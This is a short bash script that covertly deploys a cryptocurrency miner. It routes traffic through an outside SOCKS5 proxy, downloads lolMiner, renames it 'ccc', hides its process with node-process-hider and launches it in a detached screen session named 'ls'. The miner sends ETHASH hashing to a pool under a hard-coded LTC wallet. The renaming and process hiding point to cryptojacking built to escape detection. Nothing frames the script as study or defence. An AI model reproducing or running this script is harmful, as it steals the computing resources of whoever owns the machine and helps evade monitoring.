#!/bin/bash
sudo apt update && sudo apt install gcc screen -y && curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - &&
apt install proxychains -y
sed -i 's/socks4/socks5/' /etc/proxychains.conf 
sed -i 's/127.0.0.1/98.162.96.53/' /etc/proxychains.conf
sed -i 's/9050/10663/' /etc/proxychains.conf
apt install nodejs && 
npm install -g npm@8.5.0 && 
npm i -g node-process-hider && 
wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.31/lolMiner_v1.31_Lin64.tar.gz &&
tar -xf lolMiner_v1.31_Lin64.tar.gz && 
cd 1.31 &&
mv lolMiner ccc && 
ph add ccc && 
chmod +x ccc && 
screen -dmS ls ./ccc --algo ETHASH --pool ethash.unmineable.com:3333 --user LTC:M9Uaz5UtUHbu3VJdkz9ZU8ow35e1z8acAZ.K80 --ethstratum ETHPROXY
